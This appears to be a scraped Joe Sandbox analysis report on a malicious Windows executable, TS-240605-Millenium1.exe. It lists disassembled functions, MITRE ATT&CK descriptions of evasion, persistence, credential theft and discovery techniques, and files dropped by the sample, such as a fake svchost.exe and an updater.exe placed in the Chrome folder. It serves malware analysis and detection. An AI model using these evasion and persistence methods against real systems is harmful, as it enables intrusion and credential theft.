Part of subcall function 00007FF647778BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778C1A

MessageBoxW.USER32 ref: 00007FF647772C05
MessageBoxA.USER32 ref: 00007FF647772C21

Strings

Fatal error detected, xrefs: 00007FF647772BDB, 00007FF647772C13

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Fatal error detected
API String ID: 1878133881-4025702859
Opcode ID: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
Instruction ID: 58e794ad4ab1eae03e53ade312143698b074e9ed6c36aaf13e63c69f767eee30
Opcode Fuzzy Hash: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
Instruction Fuzzy Hash: 4921217262CA81D1EB20FB14E4516EA6364FF947C8FC05136EA8D87A69DF3CE215CB44

Function 00007FF64777FF80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF64777FFD0
RaiseException.KERNEL32 ref: 00007FF647780011

Strings

csm, xrefs: 00007FF64777FFFE

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
Instruction ID: 3f4489b8756f2e83939b4af1577190354cc78100fd293f1da6119e5dbbfd6ec7
Opcode Fuzzy Hash: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
Instruction Fuzzy Hash: FC112E3261DB81C2EB61AF15E54025AB7E5FB89B84F984234EE8C87768DF3CD5518704

Function 00007FF64779051C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64779054C
GetDriveTypeW.KERNEL32 ref: 00007FF64779058C

Strings

:, xrefs: 00007FF647790575

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
Instruction ID: 791c47d73f2a140c2334c011fc461f7d2858c500e46a416e67c022d5f70722ee
Opcode Fuzzy Hash: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
Instruction Fuzzy Hash: 67018BA2A2C243C6FB20BF60D4626BE63A0EF94708FC10436ED4DC6691DE2CE504DA1C

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TS-240605-Millenium1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\ProgramData\Microsoft\based.exe

C:\ProgramData\Microsoft\hacn.exe

C:\ProgramData\main.exe

C:\ProgramData\setup.exe

C:\ProgramData\svchost.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\main.exe.log

C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

Windows Analysis Report
TS-240605-Millenium1.exe

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre